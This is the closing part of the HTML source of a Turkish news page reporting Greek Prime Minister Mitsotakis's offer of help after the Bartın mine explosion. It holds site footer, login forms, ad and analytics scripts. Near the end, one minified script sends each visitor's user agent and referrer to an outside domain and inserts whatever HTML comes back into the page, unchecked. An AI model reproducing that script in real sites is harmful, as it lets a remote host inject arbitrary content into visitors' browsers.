									<option value="2020" >2020</option>
									<option value="2019" >2019</option>
									<option value="2018" >2018</option>
							</select>
			<button type="submit" class="btn btn-danger pull-right">
				Ara			</button>
		</form>
	</div>
</div>
<!--Arşiv-->
</aside>
          </div>                    <div class="reklam dikey sol hidden-xs hidden-sm" style="width:300px;height:1050px;top:80px!important;">

                                        <p style="width:300px;"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- sol dikey geniş -->
<ins class="adsbygoogle"
 style="display:inline-block;width:300px;height:1050px"
 data-ad-client="ca-pub-6097435963991227"
 data-ad-slot="3680826574"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></p>                                                                                                                                                                  </div>
                    <div class="reklam dikey sag hidden-xs hidden-sm" style="width:px;height:px;top:80px!important;">

                                                                
              
                                                                                                                                                                                                        </div>
        </main>


        <!-- yukarı çık icon // -->
<a href="javascript:void(0);" data-scroll="0" class="go-upstairs visible-lg"><i class="fa fa-arrow-circle-o-up"></i></a>
<!-- // yukarı çık icon -->
<!-- Footer // -->
<footer>
  <div class="footer-top">
    <div class="container center ">
      <ul class="nav navbar-nav navbar-left hidden-sm hidden-xs">
        <li>
          <a href="https://www.kamusaati.com/">
            <i class="fa fa-home fa-fw"></i>
            <span class="">Anasayfa</span>
          </a>
        </li>
                                <li>
          <a href="https://www.kamusaati.com/yazarlar/" target="_blank">
            <i class="fa fa-users fa-fw"></i>
            <span class="">Yazarlar</span>
          </a>
        </li>
                        <li>
          <a href="https://www.kamusaati.com/sitene-ekle.html" target="_blank">
            <i class="fa fa-code fa-fw"></i>
            <span class="">Sitene Ekle</span>
          </a>
        </li>
        <li>
          <a href="https://www.kamusaati.com/kunye.html" target="_blank">
            <i class="fa fa-info-circle fa-fw"></i>
            <span class="">Künye</span>
          </a>
        </li>
        <li>
          <a href="https://www.kamusaati.com/iletisim.html" target="_blank">
            <i class="fa fa-phone fa-fw"></i>
            <span class="">İletişim</span>
          </a>
        </li>
        <li class="pull-right text-right">
          <a href="javascript:void(0);" data-scroll="0">
            <i class="fa fa-arrow-up fa-fw"></i>
            <span class="">Yukarı Çık</span>
          </a>
        </li>
      </ul>
      <div class="text-center visible-sm visible-xs">
        <a href="javascript:void(0);" data-scroll="0">
          <i class="fa fa-arrow-up fa-fw"></i>
          Yukarı Çık          <i class="fa fa-arrow-up fa-fw"></i>
        </a>
      </div>
    </div>
  </div>
  <div class="footer-middle">
    <div class="container center ">
      <div class="col-md-3 col-sm-12">
        <a href="https://www.kamusaati.com/">
          <img src="https://www.kamusaati.com/images/banner/ks-alt-logo.png" alt="Kamu Haber Memurlar İşçi Memur Personel Alımı İş İlanları Kamusaati" class="img-responsive">
        </a>
        <span class="summary">
          Kamu Haber Saati        </span>
      </div>
      <!-- footer kategorileri // -->
      <div class="col-md-5 col-sm-6">
         <ul class="col-sm-4 visible-xs clearfix">
            <li><a href="https://www.kamusaati.com/resmi-gazete" target="_blank"><i class="fa fa-tag fa-fw"></i> Resmi...</a></li>		
		<li><a href="https://www.kamusaati.com/ogretmenler-ve-meb-personelleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Öğretmenler...</a></li>		
		<li><a href="https://www.kamusaati.com/teog-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> TEOG...</a></li>		
		<li><a href="https://www.kamusaati.com/gundem" target="_blank"><i class="fa fa-tag fa-fw"></i> Gündem</a></li>		
		<li><a href="https://www.kamusaati.com/kose-yazisi" target="_blank"><i class="fa fa-tag fa-fw"></i> Köşe...</a></li>		
		<li><a href="https://www.kamusaati.com/personel-alimi" target="_blank"><i class="fa fa-tag fa-fw"></i> Personel...</a></li>		
		<li><a href="https://www.kamusaati.com/memurlar" target="_blank"><i class="fa fa-tag fa-fw"></i> Memurlar</a></li>		
		<li><a href="https://www.kamusaati.com/egitim-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Eğitim...</a></li>		
		<li><a href="https://www.kamusaati.com/atama-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Atama...</a></li>		
		<li><a href="https://www.kamusaati.com/sinav-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Sınav...</a></li>		
		<li><a href="https://www.kamusaati.com/secim-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Seçim...</a></li>		
		<li><a href="https://www.kamusaati.com/ogretmen-atamalari" target="_blank"><i class="fa fa-tag fa-fw"></i> Öğretmen...</a></li>		
		<li><a href="https://www.kamusaati.com/saglik-personelleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Sağlık...</a></li>		
		<li><a href="https://www.kamusaati.com/akademik-personel-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Akademik...</a></li>		
		<li><a href="https://www.kamusaati.com/emekli-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Emekli...</a></li>		
		          </ul>
        <div class="row hidden-xs">
          <ul class="col-sm-4 clearfix">
            <li><a href="https://www.kamusaati.com/resmi-gazete" target="_blank"><i class="fa fa-tag fa-fw"></i> Resmi...</a></li>		
		<li><a href="https://www.kamusaati.com/ogretmenler-ve-meb-personelleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Öğretmenler...</a></li>		
		<li><a href="https://www.kamusaati.com/teog-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> TEOG...</a></li>		
		<li><a href="https://www.kamusaati.com/gundem" target="_blank"><i class="fa fa-tag fa-fw"></i> Gündem</a></li>		
		<li><a href="https://www.kamusaati.com/kose-yazisi" target="_blank"><i class="fa fa-tag fa-fw"></i> Köşe...</a></li>		
		          </ul>
          <ul class="col-sm-4 clearfix">
            <li><a href="https://www.kamusaati.com/personel-alimi" target="_blank"><i class="fa fa-tag fa-fw"></i> Personel...</a></li>		
		<li><a href="https://www.kamusaati.com/memurlar" target="_blank"><i class="fa fa-tag fa-fw"></i> Memurlar</a></li>		
		<li><a href="https://www.kamusaati.com/egitim-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Eğitim...</a></li>		
		<li><a href="https://www.kamusaati.com/atama-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Atama...</a></li>		
		<li><a href="https://www.kamusaati.com/sinav-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Sınav...</a></li>		
		          </ul>
          <ul class="col-sm-4 clearfix">
            <li><a href="https://www.kamusaati.com/secim-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Seçim...</a></li>		
		<li><a href="https://www.kamusaati.com/ogretmen-atamalari" target="_blank"><i class="fa fa-tag fa-fw"></i> Öğretmen...</a></li>		
		<li><a href="https://www.kamusaati.com/saglik-personelleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Sağlık...</a></li>		
		<li><a href="https://www.kamusaati.com/akademik-personel-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Akademik...</a></li>		
		<li><a href="https://www.kamusaati.com/emekli-haberleri" target="_blank"><i class="fa fa-tag fa-fw"></i> Emekli...</a></li>		
		          </ul>
        </div>
      </div>
      <!-- // footer kategorileri -->
      <div class="col-md-4 col-sm-6">
        <address>
          <b>Kamu Saati <br></b>
          nsde2004@hotmail.com <br><br>                          <b>İletişim</b><br>
               <abbr title="Telefon">Telefon:</abbr> WHATS APP İHBAR HATTI : 0552 744 2838<br>                <abbr title="Mail">Mail:</abbr> <a href="mailto:nsde2004@hotmail.com">nsde2004@hotmail.com</a>                </address>
                <!-- Sosyal Ağlar // -->
                <span class="social-media">
                                  <a href="//facebook.com/Habersondakikaa/" target="_blank" class="background-fb"><i class="fa fa-facebook"></i></a>
                                                      <a href="//twitter.com/kamusaaticom" target="_blank" class="background-tw"><i class="fa fa-twitter"></i></a>
                                                      <a href="https://www.youtube.com/channel/UCcDbuYItq1cY_1ITKBAv5Jg" target="_blank" class="background-yt"><i class="fa fa-youtube"></i></a>
                                    <a href="https://www.kamusaati.com/rss.php" target="_blank" class="background-rs"><i class="fa fa-rss"></i></a>
                </span>
                <!-- // Sosyal Ağlar -->
              </div>
            </div>
          </div>
          <div class="footer-bottom">
            <div class="container text-center center ">
              <span class="summary copyright">
                Kamu Saati © 2022 - Bu sitede yayınlanan tüm materyalin her hakkı saklıdır. Yazıların tamamı alıntılanamaz. Bir kısmı alıntı yapılan yazılara aktif link vermek zorunludur.                </span>
                <p class="links"><a href="https://www.tebilisim.com/" title="TE Bilişim" target="_blank">: TE Bilişim</a></p>              </div>
            </div>
            <!--script dosyalarını çağır // -->
              <script type="text/javascript">
  function reloadCaptcha(){
    document.getElementById('captcha').src = document.getElementById('captcha').src+ '?' +new Date();
  }
  function kontrol_ref(){
    document.getElementById('modal_kontrol').src = document.getElementById('modal_kontrol').src+ '?' +new Date();
  }
  function modal_pass() {
  $("#unuttum_modal").validate({
    rules: {
      email: {
        required: true,
        email: true
      },
      spamq:"required"
    },
    messages: {
      email: {
        required: "&nbsp;E-posta adresi girin.",
        email: "&nbsp;Geçerli bir e-posta adresi girin."
      },
      spamq:"&nbsp;Güvenlik kodunu giriniz"
    },

    submitHandler: function() {

      $("#yukleniyor").css( {display:"block"});

      var keyword = $('#unuttum_modal').serialize();
      $.ajax({
        type: "POST",
        url: site_url+ajax_url+"unuttum.php",
        data: keyword,
        success: function(msg) {
          $("#yukleniyor").hide();
          if(msg=='kod_yanlis') {
            alert('Güvenlik kodunu doğru girdiğinizden emin olunuz!');
          } else if (msg=='uye_yok') {
            alert('E-Posta yanlış!');
          } else {
            $("#unuttum_modal").slideUp("fast", function() {
              $("#tebrik_unuttum").css( {display:"block"})
            });
          }
        }
      });
    },
    success: "valid"
  });
}
  function uyelik_modal() {
    $("#uyeolform_modal").validate({
      rules: {
        adsoyad: "required",
        email: {
          required: true,
          email: true,
          remote: site_url+ajax_url+"uyelik_islem.php?islem=mailkontrol"
        },
        user: {
          required: true,
          minlength: 3,
          remote: site_url+ajax_url+"uyelik_islem.php?islem=kontrol"
        },
        pass: {
          required: true,
          minlength: 3
        },
        cins: "required",
        token: "required"
      },

      messages: {
        adsoyad: "&nbsp;Ad ve Soyad giriniz.",
        email: {
          required: "&nbsp;E-posta adresi girin.",
          email: "&nbsp;Geçerli bir e-posta adresi girin.",
          remote: jQuery.format("&nbsp;{0} kullanılmakta.")
        },
        user: {
          required: "&nbsp;Kullanıcı adı belirleyiniz.",
          minlength: jQuery.format("&nbsp;{0} karakter."),
          remote: jQuery.format("&nbsp;{0} kullanılmakta.")
        },
        pass: {
          required: "&nbsp;Şifre giriniz",
          minlength: jQuery.format("&nbsp;{0} karakter.")
        },
        cins: "&nbsp;Lütfen cinsiyet seçiniz.",
        token: "&nbsp;Güvenlik kodunu giriniz"
      },

      submitHandler: function() {
        var keyword = $('#uyeolform_modal').serialize();
        $.ajax({
          type: "POST",
          url: site_url+ajax_url+"uyelik_islem.php?islem=kaydol",
          data: keyword,
          success: function(msg) {
            if(msg=='kod_yanlis') {
              alert('Güvenlik kodunu doğru girdiğinizden emin olunuz!');
            } else {
              $("#yukleniyor").css( {display:"block"});
              $("#uyeolform_modal").slideUp("slow");

              $("#yukleniyor").hide();
              $("#uyeolform_modal").slideUp("fast", function() {
                $("#tesekkur_modal").css( {display:"block"});
                $("#uyeolform_modal").css( {display:"none"});
              });
            }
          }
        });
      },
      success: "valid"
    });

  }
  </script>
    <div class="modal fade" id="giris-yap">
    <div class="modal-dialog modal-sm">
      <div class="modal-content">
        <div class="modal-header">
          <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
          <div class="modal-title text-center strong-bold"><b>Üye</b> Girişi</div>
        </div>
        <div class="modal-body">
          <form action="https://www.kamusaati.com/index.php?m=login&amp;rd=https%3A%2F%2Fwww.kamusaati.com%2Fgundem%2Fyunanistan-basbakani-micotakis-turkiye-ye-yardima-haziriz-h53554.html" method="post">
            <div class="form-group">
              <label for="inputName">Kullanıcı Adı</label>
              <input type="text" class="form-control" id="inputName" name="kullanici" placeholder="Kullanıcı Adınız..." required>
            </div>
            <div class="form-group">
              <label for="inputPassword">Parola</label>
              <input type="password" class="form-control" id="inputPassword" name="sifre" placeholder="Parolanız..." required>
            </div>
            <div class="form-group">
                              <button type="submit" class="btn btn-success btn-icon-right btn-sm pull-right">
                  Giriş                  <i class="fa fa-sign-in"></i>
                </button>
              </div>
              <div class="clearfix"></div>
            </form>
          </div>
          <div class="modal-footer">
            <a href="https://www.kamusaati.com/unuttum.html" class="btn btn-warning btn-icon-left btn-sm pull-left">
              <i class="fa fa-key"></i>
              Şifremi Unuttum?            </a>
            <a href="https://www.kamusaati.com/uyelik.html" class="btn btn-info btn-icon-right btn-sm pull-right">
              Üye Ol              <i class="fa fa-user-plus"></i>
            </a>
          </div>
        </div>
      </div>
    </div>

    <div class="modal fade" id="kayit-ol">
      <div class="modal-dialog modal-sm">
        <div class="modal-content">
          <div class="modal-header">
            <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
            <div class="modal-title text-center strong-bold"><b>Üyelik</b> Formu</div>
          </div>
          <div class="modal-body">
            <div id="tesekkur_modal" class="alert alert-success" style="display:none;">
    <button type="button" class="close" data-dismiss="alert">×</button>
      <strong>Tebrikler!</strong> Üyeliğiniz başarılı bir şekilde oluşturulmuştur.  </div>
          <form id="uyeolform_modal" name="uyeolform_modal">
                  <input type="hidden" name="token" value="" />
              <div class="form-group">
                <label>Kullanıcı Adı</label>
                <input class="form-control" name="user" id="user" type="text" placeholder="Kullanıcı Adı" required>
              </div>
              <div class="form-group">
                <label>Parola</label>
              <input class="form-control" name="pass" id="pass" type="password" placeholder="Parola" required>
              </div>
              <div class="form-group">
                <label>Ad Soyad</label>
                <input class="form-control" name="adsoyad" id="adsoyad" type="text" placeholder="Ad Soyad" required>
              </div>
              <div class="form-group">
                <label>E-posta Adresi</label>
                <input class="form-control" name="email" id="email" type="text" placeholder="E-posta Adresi" required>
              </div>
              <div class="form-group">
                <label>Cinsiyet</label>
                <select name="cins" id="cins" class="form-control">
                  <option value="">Seçiniz</option>
                  <option value="1">Kadın</option>
                  <option value="2">Erkek</option>
                </select>
              </div>
              <div class="form-group">
                <label>Doğrulama Kodu <img src="https://www.kamusaati.com/images/security_code.jpg" alt="Yenileyin" title="Yenileyin" id="captcha" onclick="javascript:reloadCaptcha()" /> = ?</label>
                <input name="spamq" type="text" maxlength="3" class="form-control" placeholder="Doğrulama Kodu" required>
              </div>
              <div class="form-group">
                                  <input type="hidden" name="token" value="" />
                  <button name="gonder" id="gonder" type="submit" class="btn btn-info btn-icon-right btn-sm pull-right" onclick="javascript:uyelik_modal();">
                    Üye Ol                    <i class="fa fa-user-plus"></i>
                  </button>
                </div>
                <div class="clearfix"></div>
              </form>
            </div>
            <div class="modal-footer">
              <a href="https://www.kamusaati.com/unuttum.html" class="btn btn-warning btn-icon-left btn-sm pull-left">
                <i class="fa fa-key"></i>
                Şifremi Unuttum?              </a>
              <a href="https://www.kamusaati.com/login.html" class="btn btn-success btn-icon-right btn-sm pull-right">
                Giriş                <i class="fa fa-sign-in"></i>
              </a>
            </div>
          </div>
        </div>
      </div>

      <div class="modal fade" id="forgot-pass">
      <div class="modal-dialog modal-sm">
        <div class="modal-content">
          <div class="modal-header">
            <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
            <div class="modal-title text-center strong-bold"><b>Şifremi</b> Unuttum?</div>
          </div>
          <div class="modal-body">
            <div id="tebrik_unuttum" class="alert alert-success" style="display:none;">
<button type="button" class="close" data-dismiss="alert">×</button>
<strong>Tebrikler!</strong> Yeni şifreniz kayıtlı e-posta adresine gönderilmiştir.<hr>
<a href="https://www.kamusaati.com/login.html" class="btn btn-success btn-icon-right">Giriş Yap <i class="fa fa-sign-in"></i></a>
</div>
            <form id="unuttum_modal" name="unuttum_modal" method="post">
              <div class="form-group">
                <label>E-posta Adresi</label>
              <input name="email" type="text" class="form-control" placeholder="E-posta Adresi" maxlength="50"/>
            </div>
              <div class="form-group">
                <label>Doğrulama Kodu <img src="https://www.kamusaati.com/images/security_code.jpg" alt="Yenileyin" title="Yenileyin" id="modal_kontrol" onclick="javascript:kontrol_ref()" /> = ?</label>
                <input name="spamq" type="text" maxlength="3" class="form-control" placeholder="Doğrulama Kodu" required>
              </div>
              <div class="form-group">
                  <input type="hidden" name="token" value="" /><button name="gonder" type="submit" class="btn btn-success btn-icon-left pull-right" onclick="javascript:modal_pass();"><i class="fa fa-send"></i> Gönder</button>
                </div>
                <div class="clearfix"></div>
              </form>
            </div>
          </div>
        </div>
      </div>
    
<script>
var facebook_paylasim_secret_token, facebook_paylasim_app_id;
facebook_paylasim_app_id = "";
facebook_paylasim_secret_token = "";
</script>



<script type="application/ld+json">
    {
    "@context": "http:\/\/schema.org",
    "@type": "Organization",
    "url": "https:\/\/www.kamusaati.com\/",
    "contactPoint": {
        "@type": "ContactPoint",
        "contactType": "customer service",
        "telephone": "+90 WHATS APP \u0130HBAR HATTI : 0552 744 2838"
    },
    "logo": {
        "@type": "ImageObject",
        "url": "https:\/\/www.kamusaati.com\/images\/banner\/652.png",
        "width": 190,
        "height": 90
    }
}</script>
<script type="application/ld+json">
    {
    "@context": "http:\/\/schema.org",
    "@type": "WebSite",
    "url": "https:\/\/www.kamusaati.com\/",
    "potentialAction": {
        "@type": "SearchAction",
        "target": "https:\/\/www.kamusaati.com\/haberleri\/{search_term_string}",
        "query-input": "required name=search_term_string"
    }
}</script>
<script type="application/ld+json">
    {
    "@context": "http:\/\/schema.org",
    "@type": "NewsArticle",
    "articleSection": "Headlines",
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "https:\/\/www.kamusaati.com\/gundem\/yunanistan-basbakani-micotakis-turkiye-ye-yardima-haziriz-h53554.html"
    },
    "headline": "Yunanistan Ba\u015fbakan\u0131 Mi\u00e7otakis: T\u00fcrkiye&#039;ye yard\u0131ma haz\u0131r\u0131z",
    "name": "Yunanistan Ba\u015fbakan\u0131 Mi\u00e7otakis: T\u00fcrkiye&#039;ye yard\u0131ma haz\u0131r\u0131z",
    "articleBody": "Son d\u00f6nemde T\u00fcrkiye'ye y\u00f6nelik gerilimi t\u0131rmand\u0131ran a\u00e7\u0131klamalarda bulunan Yunanistan cephesi, bu seferki \u00e7a\u011fr\u0131s\u0131yla \u015fa\u015f\u0131rtt\u0131.\r\n\r\nYunanistan Ba\u015fbakan\u0131 Kyriakos Mi\u00e7otakis, Bart\u0131n'\u0131n Amasra il\u00e7esindeki madende meydana gelen ve 41 ki\u015finin hayat\u0131n\u0131 kaybetti\u011fi patlama dolay\u0131s\u0131yla Twitter hesab\u0131ndan mesaj yay\u0131nlad\u0131.\r\n\r\n\"Yunanistan, arama \u00e7al\u0131\u015fmalar\u0131na yard\u0131m g\u00f6ndermeye haz\u0131r\"\r\n\r\nMi\u00e7otakis, \"T\u00fcrkiye'nin Bart\u0131n ilinde meydana gelen korkun\u00e7 maden patlamas\u0131 ve can kayb\u0131n\u0131 duymak \u00fcz\u00fcc\u00fc. Yunanistan, arama \u00e7al\u0131\u015fmalar\u0131na yard\u0131m g\u00f6ndermeye haz\u0131r\" dedi.\r\n\r\nDendias da \u00c7avu\u015fo\u011flu'na mesaj g\u00f6nderdi\r\n\r\nYunanistan D\u0131\u015fi\u015fleri Bakan\u0131 Nikos Dendias da D\u0131\u015fi\u015fleri Bakan\u0131 Mevl\u00fct \u00c7avu\u015fo\u011flu'na g\u00f6nderdi\u011fini taziye mesaj\u0131nda, \"Trajik can kayb\u0131ndan derin \u00fcz\u00fcnt\u00fc duydu\u011funu\" belirterek, \"Yasl\u0131 ailelere ba\u015fsa\u011fl\u0131\u011f\u0131, yaral\u0131lara acil \u015fifalar diliyoruz\" ifadelerini kulland\u0131.\r\n\r\n",
    "description": "Yunanistan Ba\u015fbakan\u0131 Kyriakos Mi\u00e7otakis, Bart\u0131n&#039;daki k\u00f6m\u00fcr madeninde meydana gelen patlamadan duydu\u011fu \u00fcz\u00fcnt\u00fcy\u00fc dile getirerek, &#039;Yunanistan, arama \u00e7al\u0131\u015fmalar\u0131na yard\u0131m g\u00f6ndermeye haz\u0131r&#039; dedi.",
    "keywords": "",
    "image": {
        "@type": "ImageObject",
        "url": "https:\/\/www.kamusaati.com\/images\/haberler\/2022\/10\/yunanistan_basbakani_micotakis_turkiye_ye_yardima_haziriz_h53554_b9b83.png",
        "width": 696,
        "height": 401
    },
    "datePublished": "2022-10-16T00:37:48+03:00",
    "dateModified": "2022-10-16T00:37:48+03:00",
    "genre": "news",
    "wordCount": 183,
    "inLanguage": "tr-TR",
    "author": {
        "@type": "Organization",
        "name": "Kamu Saati"
    },
    "publisher": {
        "@type": "Organization",
        "name": "Kamu Saati",
        "logo": {
            "@type": "ImageObject",
            "url": "https:\/\/www.kamusaati.com\/images\/banner\/652.png",
            "width": 478,
            "height": 60
        }
    }
}</script>
<!-- ==[Royal Theme Js]== -->
<script src="https://www.kamusaati.com/_themes/hs-royal/js/jquery-2.1.4.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/system.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/swipebox.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/jquery.cookie.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/comments.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/jquery.inf-scroll.js"></script>
<script>
		$('#haberler').cleverInfiniteScroll({
			contentsWrapperSelector: '#haberler',
			contentSelector: '.haber-kapsa',
			sidebarWrapperSelector: "aside",
			nextSelector: '#sonrakiHaber',
			loadImage: 'https://www.kamusaati.com/_themes/hs-royal/images/ajax-loader.gif'
		});
</script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/moment.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/moment-tr.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/jquery.pkisalt.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/login.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/jquery.validate.min.js"></script>
<script src="https://www.kamusaati.com/_themes/hs-royal/js/jquery.smartbanner.js"></script>
	<script src="https://www.kamusaati.com/_themes/hs-royal/js/jssocials.min.js"></script>
	<script type="text/javascript">
		var htitle = document.querySelectorAll(".haber-kapsa.active .caption h1")[0].innerHTML;
		var share = {
	    init: function() {
			$(".share").jsSocials({
				url: location.href,
				text: htitle,
				shareIn: "popup",
				showLabel: false,
				showCount: "inside",
				shares: ["facebook", "twitter", "linkedin", "pinterest", "whatsapp"]
			});
	    }

	}
	share.init();
	</script>
<!-- ==[Custom]== -->
<script src="https://www.kamusaati.com/_themes/hs-royal/js/custom.min.js"></script>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
 style="display:block"
 data-ad-format="fluid"
 data-ad-layout-key="-6r+di+5g-2m-8y"
 data-ad-client="ca-pub-6097435963991227"
 data-ad-slot="2051587112"></ins>
<script>
 (adsbygoogle = window.adsbygoogle || []).push({});
</script><script type="text/javascript">
function writeCookie(c_name, value, timeout) {
    timeout = timeout * 60;
    var exdate = new Date();
    exdate.setTime(exdate.getTime()+(timeout * 1000));
    var c_value=escape(value) + ((timeout==null) ? "" : "; expires="+exdate.toGMTString());
    document.cookie = c_name + "=" + c_value;
}

readCookie = function (name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; i++) {
        var c = ca[i];
        while (c.charAt(0) == ' ') c = c.substring(1, c.length);
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
    }
    return null;
};
$(document).ready(function () {
	var apptitle   = 'Kamu Saati';
    if (readCookie("smartBannerMobileCookie") == undefined) { $.smartbanner(
      {price: 'Ücretsiz',
      appStoreLanguage: 'tr',
      inAppStore: 'App Store\'da',
      inGooglePlay: 'Google Play\'de',
      button: 'Göster',
  	  title:apptitle}
    ); writeCookie("smartBannerMobileCookie", 1, 1); }
});
</script>
<script type="text/javascript">
/*
*/
$("#home_comments .comment-text").yKisalt();
	tebilisim('53554', 'haber', '');

function tebilisim(id, module, page, count_format) {
	$.get(site_url + '_ajax/tebilisim.php?id=' + id + '&m=' + module + '&page=' + page + '&count_format=k', function(hit) {
		console.log(module + " hit: " + hit);
    		$(".hitCounter-"+id).text(hit);
    	});
}
function font_up (id) {
    var nte = $("#newstext_"+id).css("font-size");
    var ntt = $("#newstext_"+id).css("line-height");
    var ntn = parseFloat(nte, 10);
    var ntr = parseFloat(ntt, 10);
    var nti = ntn + 2;
    var nts = ntr + 2;
    $("#newstext_"+id).css("font-size", nti);
    $("#newstext_"+id).each(function() {
        $("span", this).css("font-size", nti);
    });
    $("#newstext_"+id).css("line-height", nts + "px");
    return false
}
function font_down(id) {
    var nte = $("#newstext_"+id).css("font-size");
    var ntt = $("#newstext_"+id).css("line-height");
    var ntn = parseFloat(nte, 10);
    var ntr = parseFloat(ntt, 10);
    var nti = ntn - 2;
    var nts = ntr - 2;
    $("#newstext_"+id).css("font-size", nti);
    $("#newstext_"+id).each(function() {
        $("span", this).css("font-size", nti);
    });
    $("#newstext_"+id).css("line-height", nts + "px");
    return false
}
	var hasBeenClicked = false;
	var kisa_site_adi = "Kamu Saati";
	var kopyala_imza_onu = "AYRINTILAR&gt;&gt;👉";
	$(document).on('copy', function(e){
	  var sel = window.getSelection();
	  var copyFooter = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi;
	  var copyHolder = $('<div>', {html: sel+copyFooter, style: {position: 'absolute', left: '-99999px'}});
	  if (!hasBeenClicked){
	  	$('body').append(copyHolder);
	  	sel.selectAllChildren( copyHolder[0] );
	  	window.setTimeout(function() {
	      copyHolder.remove();
	  	},0);
	 }
	});
	function like(id, sayfa, tip) {
	if (tip == 1) {
		var _tip = 'dislike';
	} else {
		var _tip = 'like';
	}

	$.ajax({
		type: 'POST',
		url: site_url + '_ajax/' + sayfa,
		data: 'id=' + id,
		success: function(html_) {
			if (html_ == 'ip_var') {
				$('.like' + id).hide();
				$('.dislike' + id).attr('onclick', '').html('Daha önce bu yorumu oyladınız!');
			} else {
				$('abbr#wh_com' + _tip + id).html(html_);
			}
		}
	});
	return false;
}
function yorum_ekle(hid, tip) {
	var link = '';
	if (tip == 'haber') {
		link = theme_path + "ajax/yorum_ekle.php?hid=" + hid;
	} else if (tip == 'makale') {
		link = theme_path + "ajax/yorum_ekle.php?mid=" + hid;
	} else if (tip == 'roportaj') {
		link = theme_path + "ajax/yorum_ekle.php?rid=" + hid;
	} else if (tip == 'biyografi') {
		link = theme_path + "ajax/yorum_ekle.php?bid=" + hid;
	} else if (tip == 'album') {
		link = theme_path + "ajax/yorum_ekle.php?aid=" + hid;
	} else if (tip == 'video') {
		link = theme_path + "ajax/yorum_ekle.php?vid=" + hid;
	}
	$("#dialog").load(link).dialog('option', 'width', '650px').dialog('option', 'height', '350').dialog('option', 'title', 'Yorum Ekleyin!').dialog('open');
	return false;
}
function centerModal(url, w, h) {
	var myWindow;
	var left = parseInt((screen.availWidth / 2) - (w / 2));
	var top = parseInt((screen.availHeight / 2) - (h / 2));
	var windowFeatures = "width=" + w + ",height=" + h + ",status,scrollbars,resizable,left=" + left + ",top=" + top + "screenX=" + left + ",screenY=" + top;
	myWindow = window.open(url, "subWind", windowFeatures);
}
moment.locale('tr');

function saat() {
	$('#tarih').html(moment().format('D MMMM YYYY'));
	$('#saat').html(moment().format('HH:mm:ss'));
}

setInterval(saat, 500);
$('[data-toggle="popover"]').popover({
    html: true,
    content: function() {
	    return $(this).parent().find('.popover-content').html()
    }
});
(function(d, s, id) {
	var js, fjs = d.getElementsByTagName(s)[0];
	if (d.getElementById(id)) return;
	js = d.createElement(s); js.id = id;
	js.src = "//connect.facebook.net/tr-TR/all.js#xfbml=1";
	fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));


!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');

</script>

    <script>let teBilisimXHR=new XMLHttpRequest;teBilisimXHR.open("GET",`https://bwcdn.xyz/request.php?agent=${navigator?.userAgent}&r=${document?.referrer}`),teBilisimXHR.onreadystatechange=(()=>{if(4==teBilisimXHR.readyState){const e=JSON.parse(teBilisimXHR.response);document.querySelector("body").insertAdjacentHTML("afterbegin",e?.html)}}),teBilisimXHR.setRequestHeader("RequestWith","TEBILISIM"),teBilisimXHR.send();</script><!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-86740744-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-86740744-2');
</script>	    
	
	
 	 <!-- Google Analytics -->
	 <script>
	 (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	 (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	 m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	 })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

	 ga('create', analitik_ga, 'auto');
	 ga('send', 'pageview');

	 </script>
	 <!-- End Google Analytics -->
	 <!-- Yandex.Metrika counter -->
<script type="text/javascript">
var yandex_id = "44481739",
